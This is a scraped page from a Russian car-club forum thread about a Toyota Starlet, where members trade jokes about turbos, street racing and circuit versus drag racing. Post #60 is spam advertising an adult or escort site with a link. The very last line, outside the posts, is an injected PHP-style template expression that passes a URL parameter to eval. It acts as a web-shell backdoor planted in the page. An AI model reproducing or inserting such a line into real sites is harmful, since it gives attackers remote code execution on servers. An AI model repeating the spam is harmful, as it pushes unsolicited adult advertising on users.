+ Ответить в теме
Страница 6 из 6 ПерваяПервая ... 4 5 6
Показано с 51 по 60 из 60

Тема: Toyota Starlet


  1. #51
    GTI-Racing fUJKE is on a distinguished road Аватар для fUJKE
    Регистрация
    07.05.2006
    Сообщений
    212
    <div class='quotetop'>Цитата(Chuka &#064; Mar 11 2009, 16&#58;07) <{POST_SNAPBACK}></div><div class='quotemain'>Просто интересно, третесь на адм, оч много апргейдов на машине... да и вроде механники Лукойла были фанатами тайот... но там селики)[/b][/quote]
    Что есть трусь на адм?)))) кто мешает вам приехать и потереться так же?)))) [img]style_emoticons/<#EMO_DIR#>/big_smile1.gif[/img] [img]style_emoticons/<#EMO_DIR#>/big_smile1.gif[/img] [img]style_emoticons/<#EMO_DIR#>/big_smile1.gif[/img]

  2. #52
    <div class='quotetop'>Цитата(fUJKE &#064; Mar 11 2009, 16&#58;57) <{POST_SNAPBACK}></div><div class='quotemain'>Что есть трусь на адм?)))) кто мешает вам приехать и потереться так же?)))) [img]style_emoticons/<#EMO_DIR#>/big_smile1.gif[/img] [img]style_emoticons/<#EMO_DIR#>/big_smile1.gif[/img] [img]style_emoticons/<#EMO_DIR#>/big_smile1.gif[/img][/b][/quote]
    все все понял заткнулся [img]style_emoticons/<#EMO_DIR#>/beat_brick.gif[/img]
    The day I've bought my GTI was the day I became alive. ©
    GTI не стареют, со временем они становятся быстрее, и ниже. ©

  3. #53
    Ха, ну в 2009 с твоим весом и тд04, против моего веса и к03 думаю безсмысленно)
    Вообще ты больно дерзок... Я не слепой, и вижу что машина не драговая, и на трэке с ней тягатся будит сложновато...
    Мой пост был не брошенный в тебя камень, а просто сказал что было...

  4. #54
    GTI-Racing Spaikerr is on a distinguished road Аватар для Spaikerr
    Регистрация
    02.09.2006
    Откуда
    МСК
    Машина
    корч
    Сообщений
    719
    <div class='quotetop'>Цитата(STILL &#064; Mar 11 2009, 17&#58;39) <{POST_SNAPBACK}></div><div class='quotemain'>Ха, ну в 2009 с твоим весом и тд04, против моего веса и к03 думаю безсмысленно)
    Вообще ты больно дерзок... Я не слепой, и вижу что машина не драговая, и на трэке с ней тягатся будит сложновато...
    Мой пост был не брошенный в тебя камень, а просто сказал что было...[/b][/quote]
    [img]style_emoticons/<#EMO_DIR#>/beat_brick.gif[/img] слив не засчитан&#33;&#33;
    mk2 VR6 размазан по отбойнику

  5. #55
    GTI-Racing fUJKE is on a distinguished road Аватар для fUJKE
    Регистрация
    07.05.2006
    Сообщений
    212
    Да нет никаких сливов-ерунда ето все) просто как я и думал то что просто от клумбы к клумбе ездию или если параллельно на светофоре стоим потом газ нажали-за заезд принимают) а я реально всего 2 вечера именно заежал) г4 и атмотазов не было в соперниках)))))

  6. #56
    Я не вижу смысла спора, я посчитал что ты заехал, ты говориш что нет...
    Вывод либо у тебя реально в 2 раза лучьше моей едит, раз на пол тапочьки, либо ты вреш [img]style_emoticons/<#EMO_DIR#>/smile.gif[/img]
    Я думаю каждый останется при своём мнении:) Никаких обид:)
    Драг гавно, кольо рулит:)

  7. #57
    <div class='quotetop'>Цитата(STILL &#064; Mar 11 2009, 18&#58;49) <{POST_SNAPBACK}></div><div class='quotemain'>Драг гавно, кольо рулит:)[/b][/quote]
    кольцо это клево, и весело. за счет большего кол-ва кругов удается добиться высокой точности пилотирования...
    The day I've bought my GTI was the day I became alive. ©
    GTI не стареют, со временем они становятся быстрее, и ниже. ©

  8. #58
    GTI-Racing fUJKE is on a distinguished road Аватар для fUJKE
    Регистрация
    07.05.2006
    Сообщений
    212
    <div class='quotetop'>Цитата(STILL &#064; Mar 11 2009, 18&#58;49) <{POST_SNAPBACK}></div><div class='quotemain'>Я не вижу смысла спора, я посчитал что ты заехал, ты говориш что нет...
    Вывод либо у тебя реально в 2 раза лучьше моей едит, раз на пол тапочьки, либо ты вреш [img]style_emoticons/<#EMO_DIR#>/smile.gif[/img]
    Я думаю каждый останется при своём мнении:) Никаких обид:)
    Драг гавно, кольо рулит:)[/b][/quote]
    ну просто риально странновато было бы если бы я заежал и меня легко г4 сток в 150лс обьехал - учитывая что от старлета который ты знаешь я уежал легко и мимо) да и просто сомнительно что 170лс на сликах проиграло бы сток г4 ))))))) так что ошибка вышла - я обычно тыщ до 4 езжу)

    кольцо рулит-но денег пистец [img]style_emoticons/<#EMO_DIR#>/sweet_kiss.gif[/img]

  9. #59
    У миня не 150, старлетку белую я тоже лихо обьезжаю...

  10. #60
    GTI-Racing askoldovd is on a distinguished road Аватар для askoldovd
    Регистрация
    11.02.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    559
    Вы будете не только получать истинный кайф, а и поймете,
    насколько хороши в постели, так как девушки издают такие
    стоны, что невозможно устоять. Все они не поддельные
    и очень возбуждающие
    https://bebi.mobi/ankets/expencive

+ Ответить в теме
Страница 6 из 6 ПерваяПервая ... 4 5 6

Похожие темы

  1. Toyota Camry 2009
    от Шумок в разделе Покупка и продажа авто
    Ответов: 3
    Последнее сообщение: 05.06.2013, 10:51
  2. продам или поменяюсь Toyota Starlet
    от fUJKE в разделе Покупка и продажа авто
    Ответов: 20
    Последнее сообщение: 07.09.2009, 18:13
  3. Продаёться Toyota Altezza RS 200
    от MadSnowMan в разделе Покупка и продажа авто
    Ответов: 5
    Последнее сообщение: 30.06.2009, 11:30
  4. VW Golf GTI vs Toyota Celica
    от magnum126 в разделе Клубная Тема
    Ответов: 162
    Последнее сообщение: 21.06.2008, 01:38
  5. Toyota RAV4 `2001
    от MORG m-customs в разделе Покупка и продажа авто
    Ответов: 1
    Последнее сообщение: 06.07.2007, 21:17

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}